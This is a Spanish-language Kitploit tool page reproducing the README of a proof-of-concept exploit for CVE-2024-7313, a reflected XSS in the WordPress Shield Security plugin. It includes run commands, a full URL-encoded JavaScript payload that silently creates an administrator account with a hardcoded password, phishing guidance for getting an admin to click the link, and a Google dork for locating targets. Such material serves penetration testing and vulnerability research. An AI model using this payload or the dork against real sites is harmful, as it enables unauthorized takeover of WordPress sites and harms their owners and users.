Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-7313 — Prueba de concepto personalizada sobre XSS para la creación no autorizada de cuentas de administrador mediante el plugin de WordPress Shield Security < 20.0.6 | Kitploit
Herramientas/GitHubGitHub/wayne-ker/cve-2024-7313
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubwayne-ker/cve-2024-7313

CVE-2024-7313

Prueba de concepto personalizada sobre XSS para la creación no autorizada de cuentas de administrador mediante el plugin de WordPress Shield Security < 20.0.6

Ver Repositorio
31hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotación de vulnerabilidad del plugin Shield Security (CVE-2024-7313)

Kali Linux Works on My Machine Sleep Deprivation

Resumen

Este repositorio contiene un script PoC en Python diseñado para explotar una vulnerabilidad de XSS reflejado en el plugin Shield Security para WordPress, que afecta a las versiones anteriores a la 20.0.6. La vulnerabilidad (CVE-2024-7313) permite a un atacante crear un enlace malicioso personalizado para el objetivo que, cuando un administrador hace clic en él, crea una cuenta de administrador no autorizada mediante XSS. El script detecta automáticamente instalaciones vulnerables y genera un payload para explotar la vulnerabilidad.

Información de la vulnerabilidad

  • CVE: CVE-2024-7313
  • Plugin: Shield Security < 20.0.6
  • Gravedad: Alta
  • Sistemas afectados: Sitios web de WordPress que utilizan versiones < 20.0.6 del plugin Shield Security
  • Tipo de ataque: Cross-Site Scripting reflejado (XSS)
  • Fecha de publicación: 7 de agosto de 2024
  • OWASP TOP-10: A7: Cross-Site Scripting (XSS)

Uso

Requisitos previos

  • Python 3.x
  • Bibliotecas requests y beautifulsoup4

Instale las bibliotecas necesarias con:

root@kitploit:~
pip install requests beautifulsoup4

Ejecutar el script

  1. Clone el repositorio:
root@kitploit:~
git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
cd CVE-2024-7313
  1. Ejecute el script con la URL del objetivo:
root@kitploit:~
python3 exploit.py <target_url>

Ejemplo:

root@kitploit:~
python3 exploit.py http://127.0.0.1

Después de introducir los detalles necesarios para el nuevo usuario administrador (nombre de usuario, correo electrónico, nombre y apellido), el script generará una URL de payload. Puede pegar esta URL en su navegador para ejecutar el ataque de XSS reflejado, que creará un nuevo usuario administrador en el sitio de WordPress.

  1. Salida de ejemplo:
root@kitploit:~
#############################################################################
#                                                                           #
#                                                                           #
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
#                                                                           #
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #
#    Reflected XSS in WordPress Shield Security Plugin                      #
#    Versions Affected: < 20.0.6                                            #
#    Risk: High                                                             #
#    Developed by: Wayne-Kerr                                              #
#    Published: August 7, 2024                                              #
############################################################################# 
Shield Security version is vulnerable. Let's continue.
Enter username: fakename
Enter email: [email protected]
Enter first name: Haxor
Enter last name: test

Using hardcoded password: HaxorStrongAFPassword123!!

Generated XSS Payload URL: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E

Una vez que visite la URL de payload XSS generada, se ejecutará el exploit y se creará un nuevo usuario administrador en el sitio de WordPress objetivo.

Menú de ayuda

Puede acceder al menú de ayuda ejecutando:

root@kitploit:~
python3 exploit.py -h

Dork para encontrar sitios vulnerables

Para identificar sitios web que usan el plugin vulnerable, puede utilizar el siguiente dork:

root@kitploit:~
inurl:"/wp-content/plugins/wp-simple-firewall/"

Esto le ayudará a encontrar sitios web que tengan instalado el plugin Shield Security. Tenga en cuenta que el número de versión no es visible públicamente, por lo que puede ser necesaria una prueba manual.

Cómo funciona

  • El script primero comprueba si la instalación de WordPress objetivo está usando una versión vulnerable del plugin Shield Security examinando la respuesta de la página wp-login.php.
  • Si la versión del plugin es vulnerable, procede a generar un payload de XSS reflejado que, al ejecutarse, creará un nuevo usuario administrador con una contraseña hardcodeada.
  • El payload se crea para usar primero una solicitud GET y encontrar dinámicamente el nonce de WordPress utilizado para la creación de cuentas, y luego usar ese nonce para enviar una solicitud POST al endpoint de creación de usuarios con los detalles del nuevo usuario proporcionados en el script.
  • El payload se codifica en URL y se muestra para usarlo en el ataque.
  • Una vez enviado a un administrador del sitio y se hace clic en el enlace, se creará un nuevo usuario Administrador en el sitio con los detalles introducidos en el script. Todo esto se realiza en segundo plano, y el administrador víctima de phishing es redirigido al panel de control de Shield Security sin ninguna pista del exploit ejecutándose en segundo plano.

Aviso legal

Esta herramienta tiene fines exclusivamente educativos y solo debe utilizarse en entornos de pruebas de penetración autorizados. El acceso no autorizado o el uso de sistemas que no le pertenecen es ilegal. El autor no es responsable del mal uso de esta herramienta.

Licencia

Este proyecto está licenciado bajo la Licencia MIT.

Descargar herramienta